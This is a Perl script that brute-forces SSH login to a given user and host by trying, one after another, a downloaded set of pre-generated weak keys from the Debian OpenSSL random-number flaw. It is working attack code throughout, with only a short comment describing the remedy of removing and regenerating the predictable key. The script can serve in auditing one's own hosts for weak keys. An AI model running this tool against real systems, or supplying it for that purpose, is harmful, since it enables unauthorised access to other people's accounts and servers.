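#!/usr/bin/perl
#
# Script to bruteforce an SSH account with pre-generated keys.
# Check if host is vulnerable with http://itsecurity.net/
# Download pre-generated keys from http://metasploit.com/users/hdm/tools/debian-openssl/
#
# Starts with PID 1 (or the optional start PID) and goes up.
#
# Key files are expected to be named <hex-string>-<pid>; every other entry in
# the key directory (for example the matching *.pub files) is skipped.
#
# A host that accepts one of these keys has a predictable public key in the
# account's authorized_keys file; the remedy is to remove that entry and
# generate a new key pair on a system with a fixed OpenSSL.
#
# Code: Jonas Thambert jonas@thambert.com

use strict;
use warnings;

# Three positional arguments are mandatory, the fourth is optional.
if (@ARGV < 3) {
    print "Syntax : ./keyscan.pl dirwithSSHkeys username host start_with_pid(optional)\n";
    print "Example: ./keyscan.pl rsa/2048// root localhost 5000\n";
    print "Code: Jonas Thambert jonas\@thambert.com\n";
    exit 0;
}

my ($key_dir, $user, $host, $start_pid) = @ARGV;

# A missing or empty start PID means "start from the lowest PID".
$start_pid = 0 if !defined $start_pid || $start_pid eq '';
die "start_with_pid must be a non-negative integer\n"
    unless $start_pid =~ /\A[0-9]+\z/;

# Both values are handed to ssh as arguments; a leading dash would be parsed
# by ssh as an option instead of a user name or host name.
for my $arg ($user, $host) {
    die "username and host must not start with '-'\n" if $arg =~ /\A-/;
}

# Map each PID to the hex part of its key file name.  The pattern is anchored
# on both ends so that a name without a trailing -<pid> is skipped instead of
# being recorded under stale or empty capture values.
opendir(my $dh, $key_dir)
    or die "Cannot open key directory '$key_dir': $!\n";
my %key_hash_for;
for my $entry (readdir $dh) {
    next unless $entry =~ /\A([0-9a-f-]+)-([0-9]+)\z/;
    $key_hash_for{$2} = $1;
}
closedir $dh;

# Unbuffered STDOUT keeps the "trying key" lines in order with ssh's output.
$| = 1;

for my $pid (sort { $a <=> $b } keys %key_hash_for) {
    next if $pid < $start_pid;

    my $key_path = "$key_dir/$key_hash_for{$pid}-$pid";
    print "trying key: $key_path \n";

    # List-form system() runs ssh directly, without a shell, so characters in
    # the directory, user or host arguments are never interpreted as shell
    # syntax.
    my $status = system(
        'ssh', '-q',
        '-o', 'PasswordAuthentication=no',
        '-l', $user,
        '-i', $key_path,
        $host,
    );
    die "Cannot run ssh: $!\n" if $status == -1;
}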